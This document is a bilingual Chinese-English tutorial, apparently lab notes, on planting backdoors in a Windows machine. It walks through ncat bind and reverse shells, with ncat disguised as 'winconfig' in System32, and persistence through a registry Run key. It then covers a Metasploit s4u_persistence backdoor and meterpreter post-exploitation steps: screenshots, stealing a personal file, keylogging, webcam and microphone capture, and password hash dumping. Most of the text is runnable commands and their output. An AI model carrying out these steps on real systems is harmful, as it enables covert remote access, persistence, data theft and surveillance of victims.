Backdoor
ncat
1
2
ncat -h
man ncat
1
2
3
4
5
6
7
8
9
10
11
OPTIONS SUMMARY
-l, --listen Bind and listen for incoming connections
-e, --exec <command> Executes the given command
-p, --source-port port Specify source port to use
-v, --verbose Set verbosity level (can be used several times)
选项摘要
-l, --listen 绑定并监听传入的连接
-e, --exec <command> 执行给定的命令
-p, --source-port port 指定要使用的源端口
-v, --verbose 设置详细程度(可多次使用)
bind shell
受害者IP:192.168.102.152 攻击者IP:192.168.102.145
场景:我们已经利用了受害者机器,并且上传了windows版的ncat。
将ncat移动到C:\Windows\System32,并重命名为winconfig。
在受害者机器上:-e:执行文件,-e cmd.exe:cmd.exe是要执行的文件,会返回命令提示符。
1
winconfig -l -p 5555 -e cmd.exe
命令提示符进入监听状态并等待连接。
在攻击者机器上:
1
2
3
4
5
ncat 192.168.102.152 5555
dir
cd Desktop
dir
ipconfig
现在如果受害者在内网,没有那么容易从互联网访问。对我们来说执行listener并连接到受害者会更加的困难。ncat可以通过执行反向连接(reverse connection)来克服这一限制。
reverse shell
在前面的场景中,受害者运行监听器,在反向连接中,攻击者运行监听器,受害者从受保护的网络连接到攻击者的网络。
回到攻击者机器:
1
ncat -l -p 5555 -v
受害者:
1
winconfig -e cmd.exe 192.168.102.145 5555
攻击者:
1
2
3
4
5
Ncat: Connection from 192.168.102.152.
Ncat: Connection from 192.168.102.152:49158.
dir
ipconfig
persistent backdoor
Now, we are going to create persistent backdoor with ncat. With persistent backdoor, we meaned we manage to install a process or service we started to boot the victim machine, and tie the connection to the attacker machine.
In this way, even the victim reboot the machine, the backdoor was still work.
To set persistent backdoor with ncat, we can do it by adding nessary command key to victims’ registry.
攻击者机器:
1
ncat -l -p 5544 -v
受害者机器: We have to add ncat command structure to the proper place in the registry.
start->regedit
打开Registry Editor,导航到Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run。
添加winconfig二进制文件的键值对:右键->New->String Value,Name是winconfig,双击该条目来添加值。
添加想要执行的命令:
1
"C:\Windows\System32\winconfig.exe 192.168.102.145 5544 -e cmd.exe"
重启受害者机器,激活后门。
当受害者机器正在启动,返回攻击者机器看发生了什么。到目前位置什么也没发生,因为用户还没有登录。所以,登录受害者机器,并返回攻击者机器。一旦受害者登录了,可以看到受害者机器联系了攻击者机器。现在持久后门已经建立了。任何时候受害者登录,我们可以从攻击者机器进行访问。
metasploit and its meterpreter shell
For this scenario, we suppose we already have exploited the remote machine, and we have a meterpreter session on the machine. For your information, the meterpreter session is an active and interactive connection between us and victim machine. It is similarly the previous showed in the ncat, but it offers many other features.
Let’s see how we can create and install backdoor on the victim, and then execute command and script in order to obtain information from it.
The easiest way to install a backdoor on the remote system from the meterpreter shell is by running the module name s4u_persistence.
1
2
3
4
5
6
7
8
9
10
11
12
13
msf exploit(handler) > use exploit/windows/local/s4u_persistence
msf exploit(s4u_persistence) > show options
Module options (exploit/windows/local/s4u_persistence):
Name Current Setting Required Description
SESSION yes The session to run this module on.
TRIGGER schedule yes Payload trigger method (accepted: event, lock, logon, schedule, unlock)
msf exploit(s4u_persistence) > sessions
Active sessions
Id Type Information Connection Connection
2 meterpreter x86/win32 WIN-65EMTLPDBMA\els @ WIN-65EMTLPDBMA 192.168.102.145:5555 -> 192.168.102.152:49158 (192.168.102.152)
Let’s set the module configuration by typing
1
2
3
4
5
6
7
8
9
10
msf exploit(s4u_persistence) > set session 2
session => 2
msf exploit(s4u_persistence) > set trigger logon
trigger => logon
msf exploit(s4u_persistence) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(s4u_persistence) > set lhost 192.168.102.145
lhost => 192.168.102.145
msf exploit(s4u_persistence) > set lport 1234
lport => 1234
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
msf exploit(s4u_persistence) > show options
Module options (exploit/windows/local/s4u_persistence):
Name Current Setting Required Description
SESSION 2 yes The session to run this module on.
TRIGGER logon yes Payload trigger method (accepted: event, lock, logon, schedule, unlock)
msf exploit(s4u_persistence) > exploit
[*] Started reverse handler on 192.168.102.145:1234
[*] Successfully uploaded remote executable to %TEMP%\NaiZzavOps.exe
[*] This trigger triggers on event 4101 which validates the Windows license
[*] Successfully wrote XML file to %TEMP%\zTSKlSl.xml
[+] Persistence task adpZZclEeKZ created successfully
[+] To delete task: schtasks /delete /tn "adpZZclEeKZ" /f
[*] To delete payload: del %TEMP%\NaiZzavOps.exe
[!] Could not delete file %TEMP%\zTSKlSl.xml, delete manually
The next step, is to check if the backdoor really works.
We just have to create a listener that will wait for connection. we can do it from metasploit console in a few steps.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
msf exploit(s4u_persistence) > use explot/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.102.145 yes The listen address
LPORT 5555 yes The listen port
msf exploit(handler) > set lport 1234
lport => 1234
msf exploit(handler) > show options
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.102.145 yes The listen address
LPORT 1234 yes The listen port
1
msf exploit(handler) > exploit
To test the backdoor, we have to reboot the victim machine. Of courese the previous session terminate since the machine were done, if everything works, we should give a new session after the user logs on.
1
2
3
4
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.102.145:1234
[*] Starting the payload handler...
[*] 192.168.102.152 - Mterpreter session 2 closed. Reason: Died
切换回受害者机器,输入密码。再回到攻击者机器。一旦用户登录了,我们获得一个新的Mterpreter session。
1
2
3
4
5
6
7
8
9
10
11
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.102.145:1234
[*] Starting the payload handler...
[*] 192.168.102.152 - Mterpreter session 2 closed. Reason: Died
[*] Sending stage (770048 bytes) to 192.168.102.152
[*] Mterpreter session 3 opened (192.168.102.145:1234 -> 192.168.102.152:49160) at 2015-01-22 18:25:25 +0100
[*] Sending stage (770048 bytes) to 192.168.102.152
meterpreter >
meterpreter >
meterpreter >
1
meterpreter > ifconfig
This is the simple method of installing backdoor on the victim machine.
1
2
meterpreter > screenshot
Screenshot saved to: /root/hcelmVwk.jpeg
1
eog /root/hcelmVwk.jpeg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
meterpreter > pwd
C:\Users\els
meterpreter > cd Desktop
meterpreter > ls
meterpreter > cd Important
meterpreter > ls
meterpreter > cat personal_information.txt
Secret!!!
meterpreter > download personal_information.txt /root/Desktop
meterpreter > upload
meterpreter > sysinfo
Computer : WIN-65EMTLPDBMA
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > ps # retrive list of process
meterpreter > help
Stdapi: System Commands
=================================
Command Description
execute Execute a command
reboot Reboots the remote computer
shutdown Shuts down the remote computer
Stdapi: User interface Commands
=================================
Command Description
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
Stdapi: Webcam Command
=================================
Command Description
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Password database Commands
=================================
Command Description
hashdump Dumps the contents of the SAM database
meterpreter > shutdown
